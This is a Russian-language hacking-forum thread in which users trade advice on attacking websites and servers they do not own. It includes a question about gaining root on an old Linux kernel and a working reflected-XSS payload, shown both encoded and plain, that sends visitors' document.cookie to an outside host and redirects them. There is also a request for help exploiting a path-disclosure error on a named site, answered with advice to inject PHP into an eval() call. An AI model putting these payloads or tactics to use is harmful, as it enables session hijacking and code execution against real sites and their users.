ANTICHAT — форум по информационной безопасности, OSINT и технологиям

2Scipio спасиб

Добрый ночи хотел узнать у спецов в области Unix-Like можно ли в данной ОС
Linux 2.6.9-1.667 поднять права? Реально ли вообще?

~Taxa~

KPOT_f!nd не помогает если ли еще способы???

если не сработает, тогда только искать тебе пассы и тыкатся на рута.

Нашел пассивную xss, запрос такого вида:
http://site.ru/index.php?s=w&name=&level_min=%3C%73%63%72%69%70%7 4%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65% 28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74 %74%70%3A%2F%2F%73%2E%6E%65%74%73%65%63%2E%72%75%2 F%64%6F%6F%6D%35%35%2E%67%69%66%3F%22%2B%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%64%6F%63 %75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%6 5%70%6C%61%63%65%28%27%68%74%74%70%3A%2F%2F%64%6F% 6F%6D%35%35%2E%66%72%65%65%68%6F%73%74%69%61%2E%63 %6F%6D%2F%27%29%3C%2F%73%63%72%69%70%74%3E&level_m ax=&subclass2=any&dmg_max=

или тоже самое, что и:

http://site.ru/index.php?s=w&name=&level_min=<script>img = new Image(); img.src = "http://s.netsec.ru/123.gif?"+document.cookie; document.location.replace('http://site2.ru/')</script>&level_max=&subclass2=any&dmg_max=

Почему куки не приходят через Opera? Через IE все отлично! На других не тэстил.

Захожу на сайт скачать одну из нескольких лекций, а там ошибка.
т.е. ссылки я вижу, а в описании файла вот такая фигня.
--------------------------------------------------------
Warning: filesize() [function.filesize]: stat failed for /home/www/lyric/pathology.dn.ua/html/lecturies/anomalii.immunnogo.otveta.ukr.doc in /home/www/pathology.dn.ua/html/viewpage.php(26) : eval()'d code on line 56
--------------------------------------------------------
насколько я понимаю файл на сервере превышает максимально допустимый размер
или неправильно написанный скрипт по подсчету размера файла
--------------------------------------------------------
если просто пытаюсь найти уязвимый скрипт выбрасывает на главную сраницу.

можно ли это как-то использовать кроме выяснения полных путей?

просто он файла не нашел такого и все, недумаю, что ты сможешь использовать отсутствие файла

__________________
Карфаген должен быть разрушен...

samarin, eval()'d code on line 56 - тоесть там используется eval() попробуй в разные переменные по подставлять PHP код а вдруг чёнить получится...